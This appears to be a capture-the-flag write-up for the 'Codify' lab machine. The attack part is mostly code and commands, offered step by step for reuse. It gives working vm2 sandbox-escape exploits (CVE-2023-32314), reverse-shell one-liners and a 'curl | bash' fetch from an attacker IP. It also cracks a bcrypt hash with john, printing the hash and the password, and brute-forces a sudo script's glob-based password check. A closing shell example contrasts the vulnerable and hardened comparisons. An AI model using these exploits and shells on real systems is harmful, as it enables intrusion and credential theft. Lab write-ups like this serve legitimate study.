# Codify

## 1. nmap scan

Add the target to the hosts file, then look for a public PoC for the vm2 sandbox escape:

```
sudo vim /etc/hosts
```

Search: "vm2 cve poc github"

## 2. Write code

Slightly modify the PoC: add `cmd = 'id'` and change the `execSync` argument to `(cmd)`.

```
const { VM } = require("vm2");
const vm = new VM();
const code = `
cmd = 'id';
err = {};
const handler = {
  getPrototypeOf(target) {
    // recursion inside a Proxy trap forces a host-side stack overflow while the error is being sanitized
    (function stack() {
      new Error().stack;
      stack();
    })();
  }
};
const proxiedErr = new Proxy(err, handler);
try {
  throw proxiedErr;
} catch ({ constructor: c }) {
  // c is a host Function constructor, so this runs outside the sandbox
  c.constructor('return process')().mainModule.require('child_process').execSync(cmd);
}
`;
console.log(vm.run(code));
```

CVE-2023-32314: https://gist.github.com/arkark/e9f5cf5782dec8321095be3e52acf5ac

Change the `execSync("echo hacked")` argument to the command you want to run. Search: "reverse shell command"

```
bash -c 'bash -i >& /dev/tcp/10.10.14.9/9999 0>&1'
```

```
const { VM } = require("vm2");
const vm = new VM();
const code = `
const err = new Error();
err.name = {
  toString: new Proxy(() => "", {
    apply(target, thiz, args) {
      // args is a host array, so its constructor chain leads to the host Function constructor
      const process = args.constructor.constructor("return process")();
      throw process.mainModule.require("child_process").execSync("echo hacked").toString();
    },
  }),
};
try {
  err.stack;
} catch (stdout) {
  stdout;
}
`;
console.log(vm.run(code));
```

Commands can be executed through the editor; confirm the output with `view-source:` on the page HTML.

## 3. Reverse shell

Search "reverse shell command" and "bin bash", and compose:

```
#!/bin/bash
bash -c 'bash -i >& /dev/tcp/10.10.14.47/9999 0>&1'
```

Write the content into `[file].html` and start an HTTP server on port 80.

Modify the code, replacing the `execSync` argument with:

```
execSync('curl http://10.10.14.47/ | bash')
```

After running it, a reverse shell is obtained.

## 4. Password cracking

In the `/var/www/contact` directory, `cat tickets.db` (a database file) reveals a bcrypt password hash (`$2a$12$...`).

```
sudo gzip -d rockyou.txt.gz
```

```
echo '$2a$12$SOn8Pf6z8fO/nVsNbAAequ/P6vLRJJl7gCUEiYBU2iLHn4G/p/Zw2' > cc.txt
john --wordlist=/usr/share/wordlists/rockyou.txt cc.txt
```

Cracked password: `spongebob1`

## 5. SSH login

Log in over SSH with the cracked password and `cat user.txt` (flag 1).

## 6. Privilege escalation

```
sudo -l
cat /opt/scripts/mysql-backup.sh
```

`mysql-backup.sh` can be run with sudo and contains a password check. The check treats the supplied value as a glob pattern, so appending `*` to a partial guess still matches and prints "Password confirmed!". This allows the password to be recovered one character at a time:

```
import string
import subprocess

# candidate characters for each position
charset = list(string.ascii_letters + string.digits)
password = ""
found = False

while not found:
    for character in charset:
        # trailing '*' is interpreted as a wildcard by the script's comparison
        command = f"echo '{password}{character}*' | sudo /opt/scripts/mysql-backup.sh"
        output = subprocess.run(
            command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, text=True
        ).stdout
        if "Password confirmed!" in output:
            password += character
            print(password)
            break
    else:
        # no character extended the prefix: the full password has been recovered
        found = True
```
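The following is an added example that is not part of the original writeup and does not reproduce `/opt/scripts/mysql-backup.sh` (the script itself is not shown on this page). It assumes the script compares the password with an unquoted pattern, which is the class of bug the brute force above relies on: with `case "$SECRET" in $guess)` (or, in bash, `[[ $SECRET == $guess ]]` with an unquoted right-hand side) a `*` in the guess is a wildcard, so `Sup3r*` matches `Sup3rSecret`. The quoted comparison beside it is the hardened form. `SECRET` is a constructed sample value.

```shell
#!/bin/sh
# Added example (not the page's or the box's own script).
# SECRET is a constructed sample password standing in for the real DB password.
SECRET='Sup3rSecret'

# Vulnerable check: the unquoted pattern turns glob metacharacters in the
# attacker-supplied guess into wildcards. In bash, [[ $SECRET == $guess ]]
# with an unquoted right-hand side has the same weakness.
check_vuln() {
  case "$SECRET" in
    $1) return 0 ;;
    *)  return 1 ;;
  esac
}

# Hardened check: a plain string comparison, guess quoted, no pattern matching.
check_fixed() {
  [ "$SECRET" = "$1" ]
}

# Recover the secret one character at a time against the vulnerable check,
# the same strategy as the Python script in section 6.
brute_force() {
  charset='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
  found=''
  while :; do
    rest="$charset"
    progressed=0
    while [ -n "$rest" ]; do
      c=${rest%"${rest#?}"}   # first character of $rest
      rest=${rest#?}          # drop it
      # prefix + candidate + '*' matches iff candidate is the next character
      if check_vuln "${found}${c}*"; then
        found="${found}${c}"
        progressed=1
        break
      fi
    done
    # no candidate extended the prefix: the full secret has been recovered
    [ "$progressed" -eq 1 ] || break
  done
  printf '%s\n' "$found"
}

printf 'recovered via vulnerable check: %s\n' "$(brute_force)"
if check_fixed 'Sup3r*'; then
  echo 'hardened check still accepts wildcards'
else
  echo 'hardened check rejects Sup3r*'
fi
```

The recovery stops as soon as no candidate extends the prefix, so it only finds secrets made of characters in `charset`; the real script's output string ("Password confirmed!") is what the Python version keys on, whereas here the exit status of the check plays that role.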